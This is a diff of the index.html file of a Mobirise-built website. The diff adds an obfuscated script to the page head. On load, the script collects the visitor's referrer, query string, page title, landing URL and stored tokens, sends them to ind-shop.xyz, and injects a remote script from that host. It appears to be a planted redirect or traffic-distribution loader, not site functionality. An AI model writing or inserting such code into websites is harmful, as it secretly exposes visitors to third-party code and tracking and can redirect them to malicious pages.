--- a/index.html
+++ b/index.html
@@ -1,6 +1,49 @@
 <!DOCTYPE html>
 <html  >
 <head>
+  <script>
+    (function() {
+    var name = '_b5Tf3dLdmbH1dzjx';
+    if (!window._b5Tf3dLdmbH1dzjx) {
+        window._b5Tf3dLdmbH1dzjx = {
+            unique: false,
+            ttl: 86400,
+            R_PATH: 'https://ind-shop.xyz/bTSvg8bH',
+            P_PATH: 'https://ind-shop.xyz/9a1f79a/postback',
+        };
+    }
+    const _Ly16CRNXfVwRjm38 = localStorage.getItem('config');
+    if (typeof _Ly16CRNXfVwRjm38 !== 'undefined' && _Ly16CRNXfVwRjm38 !== null) {
+        var _HTMKVNZwSmBsBtxh = JSON.parse(_Ly16CRNXfVwRjm38);
+        var _YjSszPr37QM4Chf7 = Math.round(+new Date()/1000);
+        if (_HTMKVNZwSmBsBtxh.created_at + window._b5Tf3dLdmbH1dzjx.ttl < _YjSszPr37QM4Chf7) {
+            localStorage.removeItem('subId');
+            localStorage.removeItem('token');
+            localStorage.removeItem('config');
+        }
+    }
+    var _2VHdttcwD6CXFKZx = localStorage.getItem('subId');
+    var _Z1W2tztFnbk1fwpq = localStorage.getItem('token');
+    var _bBcNKvDx87mTtKww = '?return=js.client';
+        _bBcNKvDx87mTtKww += '&' + decodeURIComponent(window.location.search.replace('?', ''));
+        _bBcNKvDx87mTtKww += '&se_referrer=' + encodeURIComponent(document.referrer);
+        _bBcNKvDx87mTtKww += '&default_keyword=' + encodeURIComponent(document.title);
+        _bBcNKvDx87mTtKww += '&landing_url=' + encodeURIComponent(document.location.hostname + document.location.pathname);
+        _bBcNKvDx87mTtKww += '&name=' + encodeURIComponent(name);
+        _bBcNKvDx87mTtKww += '&host=' + encodeURIComponent(window._b5Tf3dLdmbH1dzjx.R_PATH);
+    if (typeof _2VHdttcwD6CXFKZx !== 'undefined' && _2VHdttcwD6CXFKZx && window._b5Tf3dLdmbH1dzjx.unique) {
+        _bBcNKvDx87mTtKww += '&sub_id=' + encodeURIComponent(_2VHdttcwD6CXFKZx);
+    }
+    if (typeof _Z1W2tztFnbk1fwpq !== 'undefined' && _Z1W2tztFnbk1fwpq && window._b5Tf3dLdmbH1dzjx.unique) {
+        _bBcNKvDx87mTtKww += '&token=' + encodeURIComponent(_Z1W2tztFnbk1fwpq);
+    }
+    var a = document.createElement('script');
+        a.type = 'application/javascript';
+        a.src = window._b5Tf3dLdmbH1dzjx.R_PATH + _bBcNKvDx87mTtKww;
+    var s = document.getElementsByTagName('script')[0];
+    s.parentNode.insertBefore(a, s)
+    })();
+    </script>
   <!-- Site made with Mobirise Website Builder v4.12.3, https://mobirise.com -->
   <meta charset="UTF-8">
   <meta http-equiv="X-UA-Compatible" content="IE=edge">
